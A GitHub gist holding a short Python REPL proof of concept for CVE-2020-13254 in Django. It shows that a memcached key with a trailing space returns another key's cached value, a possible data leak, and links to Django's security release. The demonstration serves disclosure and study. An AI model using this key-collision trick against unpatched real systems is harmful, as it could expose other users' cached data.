Skip to content

Instantly share code, notes, and snippets.

@ryu22e

ryu22e/PoC.md

Last active June 3, 2020 13:57
Show Gist options
  • Save ryu22e/e8b59fbc927e53942ecd512c9173c36e to your computer and use it in GitHub Desktop.
Save ryu22e/e8b59fbc927e53942ecd512c9173c36e to your computer and use it in GitHub Desktop.
Download ZIP
【memo】PoC for CVE-2020-13254(Potential data leakage via malformed memcached keys)
Raw
PoC.md

See: https://www.djangoproject.com/weblog/2020/jun/03/security-releases/

>>> from django.core.cache import cache
>>> cache.set('my_key', 'hello, world!')
>>> cache.get('my_key')
'hello, world!'
>>> c = chr(33)
>>> c
'!'
>>> cache.get('my_key' + c)
>>> c = chr(32)
>>> c
' '
>>> cache.get('my_key' + c)  # should be None
'hello, world!'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment